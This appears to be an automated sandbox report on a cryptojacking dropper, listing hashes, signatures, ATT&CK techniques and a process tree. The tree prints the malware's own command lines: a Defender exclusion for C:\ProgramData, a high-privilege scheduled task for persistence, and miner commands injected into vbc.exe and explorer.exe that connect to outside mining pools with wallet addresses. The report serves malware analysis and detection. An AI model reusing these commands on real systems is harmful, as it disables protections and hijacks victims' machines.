cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

Analysis

max time kernel
299s
max time network
300s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
24/09/2022, 10:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
Size

862KB
MD5

a69b4b080114c6c20c5471ad5613e3bf
SHA1

e2bff2d6b4e3742e5f88b54285abe2286742257a
SHA256

cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c
SHA512

c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137
SSDEEP

6144:7lwUrVjuSJHQ7ngOzI53XvrxC8e7IDnUc5D8pDF8Z5+ECLsrski+xk30+TeE0Hu0:LVRQgDzxCUFM55sXi/00f70us

Score

8^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1288	DHUZT.exe
1744	DHUZT.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1396-208-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx
behavioral2/memory/1396-210-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1288 set thread context of 4720	1288	DHUZT.exe	79
PID 1288 set thread context of 1396	1288	DHUZT.exe	82

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2064	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3944	timeout.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3888	powershell.exe
3888	powershell.exe
3888	powershell.exe
2104	powershell.exe
2104	powershell.exe
2104	powershell.exe
1288	DHUZT.exe
1288	DHUZT.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeDebugPrivilege	2744	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
Token: SeDebugPrivilege	3888	powershell.exe
Token: SeIncreaseQuotaPrivilege	3888	powershell.exe
Token: SeSecurityPrivilege	3888	powershell.exe
Token: SeTakeOwnershipPrivilege	3888	powershell.exe
Token: SeLoadDriverPrivilege	3888	powershell.exe
Token: SeSystemProfilePrivilege	3888	powershell.exe
Token: SeSystemtimePrivilege	3888	powershell.exe
Token: SeProfSingleProcessPrivilege	3888	powershell.exe
Token: SeIncBasePriorityPrivilege	3888	powershell.exe
Token: SeCreatePagefilePrivilege	3888	powershell.exe
Token: SeBackupPrivilege	3888	powershell.exe
Token: SeRestorePrivilege	3888	powershell.exe
Token: SeShutdownPrivilege	3888	powershell.exe
Token: SeDebugPrivilege	3888	powershell.exe
Token: SeSystemEnvironmentPrivilege	3888	powershell.exe
Token: SeRemoteShutdownPrivilege	3888	powershell.exe
Token: SeUndockPrivilege	3888	powershell.exe
Token: SeManageVolumePrivilege	3888	powershell.exe
Token: 33	3888	powershell.exe
Token: 34	3888	powershell.exe
Token: 35	3888	powershell.exe
Token: 36	3888	powershell.exe
Token: SeDebugPrivilege	1288	DHUZT.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeIncreaseQuotaPrivilege	2104	powershell.exe
Token: SeSecurityPrivilege	2104	powershell.exe
Token: SeTakeOwnershipPrivilege	2104	powershell.exe
Token: SeLoadDriverPrivilege	2104	powershell.exe
Token: SeSystemProfilePrivilege	2104	powershell.exe
Token: SeSystemtimePrivilege	2104	powershell.exe
Token: SeProfSingleProcessPrivilege	2104	powershell.exe
Token: SeIncBasePriorityPrivilege	2104	powershell.exe
Token: SeCreatePagefilePrivilege	2104	powershell.exe
Token: SeBackupPrivilege	2104	powershell.exe
Token: SeRestorePrivilege	2104	powershell.exe
Token: SeShutdownPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeSystemEnvironmentPrivilege	2104	powershell.exe
Token: SeRemoteShutdownPrivilege	2104	powershell.exe
Token: SeUndockPrivilege	2104	powershell.exe
Token: SeManageVolumePrivilege	2104	powershell.exe
Token: 33	2104	powershell.exe
Token: 34	2104	powershell.exe
Token: 35	2104	powershell.exe
Token: 36	2104	powershell.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 2744 wrote to memory of 3888	2744	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe	66
PID 2744 wrote to memory of 3888	2744	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe	66
PID 2744 wrote to memory of 4736	2744	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe	68
PID 2744 wrote to memory of 4736	2744	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe	68
PID 4736 wrote to memory of 3944	4736	cmd.exe	70
PID 4736 wrote to memory of 3944	4736	cmd.exe	70
PID 4736 wrote to memory of 1288	4736	cmd.exe	72
PID 4736 wrote to memory of 1288	4736	cmd.exe	72
PID 1288 wrote to memory of 2104	1288	DHUZT.exe	73
PID 1288 wrote to memory of 2104	1288	DHUZT.exe	73
PID 1288 wrote to memory of 3688	1288	DHUZT.exe	75
PID 1288 wrote to memory of 3688	1288	DHUZT.exe	75
PID 3688 wrote to memory of 2064	3688	cmd.exe	77
PID 3688 wrote to memory of 2064	3688	cmd.exe	77
PID 1288 wrote to memory of 4720	1288	DHUZT.exe	79
PID 1288 wrote to memory of 4720	1288	DHUZT.exe	79
PID 1288 wrote to memory of 4720	1288	DHUZT.exe	79
PID 1288 wrote to memory of 4720	1288	DHUZT.exe	79
PID 1288 wrote to memory of 4720	1288	DHUZT.exe	79
PID 1288 wrote to memory of 4720	1288	DHUZT.exe	79
PID 1288 wrote to memory of 4720	1288	DHUZT.exe	79
PID 1288 wrote to memory of 4720	1288	DHUZT.exe	79
PID 1288 wrote to memory of 4720	1288	DHUZT.exe	79
PID 1288 wrote to memory of 4720	1288	DHUZT.exe	79
PID 1288 wrote to memory of 4720	1288	DHUZT.exe	79
PID 1288 wrote to memory of 4720	1288	DHUZT.exe	79
PID 1288 wrote to memory of 4720	1288	DHUZT.exe	79
PID 1288 wrote to memory of 4720	1288	DHUZT.exe	79
PID 4720 wrote to memory of 4260	4720	vbc.exe	80
PID 4720 wrote to memory of 4260	4720	vbc.exe	80
PID 1288 wrote to memory of 1396	1288	DHUZT.exe	82
PID 1288 wrote to memory of 1396	1288	DHUZT.exe	82
PID 1288 wrote to memory of 1396	1288	DHUZT.exe	82
PID 1288 wrote to memory of 1396	1288	DHUZT.exe	82
PID 1288 wrote to memory of 1396	1288	DHUZT.exe	82
PID 1288 wrote to memory of 1396	1288	DHUZT.exe	82
PID 1288 wrote to memory of 1396	1288	DHUZT.exe	82

C:\Users\Admin\AppData\Local\Temp\cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
"C:\Users\Admin\AppData\Local\Temp\cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2744
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9E29.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4736
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:3944
- - C:\ProgramData\ccl\DHUZT.exe
    "C:\ProgramData\ccl\DHUZT.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1288
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2104
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3688
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2064
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.NewWorker -p x -t 7
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4720
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:4260
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --user t1fd8D4s9ZYr87E5HaqJJehhTWq5G4A5X2z.APOCALYPSE --port 2001 --pool us-flux.fluxpools.net --pass x --coin flux
      4⤵
      PID:1396

C:\ProgramData\ccl\DHUZT.exe
C:\ProgramData\ccl\DHUZT.exe
1⤵
- Executes dropped EXE
PID:1744

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ccl\DHUZT.exe

Filesize
862KB

MD5
a69b4b080114c6c20c5471ad5613e3bf

SHA1
e2bff2d6b4e3742e5f88b54285abe2286742257a

SHA256
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

SHA512
c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137

Download Submit
C:\ProgramData\ccl\DHUZT.exe

Filesize
862KB

MD5
a69b4b080114c6c20c5471ad5613e3bf

SHA1
e2bff2d6b4e3742e5f88b54285abe2286742257a

SHA256
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

SHA512
c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137

Download Submit
C:\ProgramData\ccl\DHUZT.exe

Filesize
862KB

MD5
a69b4b080114c6c20c5471ad5613e3bf

SHA1
e2bff2d6b4e3742e5f88b54285abe2286742257a

SHA256
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

SHA512
c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHUZT.exe.log

Filesize
1KB

MD5
9bfb0f51f319fb79c0bb1f4f9fcfc7e1

SHA1
367776be8a224b0ee8271dce1723eb675a1964b2

SHA256
35d5a38e77d2755271f2897bcfdd673d3d8daa0e6e412c7272fac51aacb101f3

SHA512
0b103c722c983d513724c36da13de8b18845c3a1e4a311326947e448d304a2dbdd717d914ceeb9e8e11a6083f8ccaf7abad1bf4a2ac22e21de91d6cc74ec17bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a33a0e9376e6e8ca3677090047270b1b

SHA1
831f8604ed12f87de5a6e58122c835db05c5cafb

SHA256
45af028c44dcfcf59dc614ef31c161099e7befa7ff9459bd8ee2a792c66b2c23

SHA512
ab166f324710c900f2b817cfe2971092a6300ae04f057b10f083decd5afb38af338a531fcbe38a2f8dd036299c61a707664ae3ffe8f6bea01f9201649cf7f6cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9E29.tmp.bat

Filesize
137B

MD5
0b41592cdb8f03f9eec1254984e23aaa

SHA1
3209a963730200c3b8161f2fc6b8492f58aee0e7

SHA256
a239b8d1340930de74a1dce5e5084aed55c62e8c641b2221ef989462b497df81

SHA512
03c5bdf1313d8b1914abe9bedd71cb3a8f594b2f6fa365ef8fb2fdb6ac161c9267494e126977f24e9a4295785c2af797cf08302a3aabfdff180afa819003c968

Download Submit
memory/1396-210-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1396-208-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/2744-120-0x0000000000800000-0x00000000008DC000-memory.dmp

Filesize
880KB

Download
memory/3888-132-0x000002031A3B0000-0x000002031A426000-memory.dmp

Filesize
472KB

Download
memory/3888-129-0x000002031A200000-0x000002031A222000-memory.dmp

Filesize
136KB

Download
memory/4720-203-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4720-204-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4720-206-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4720-207-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4720-201-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download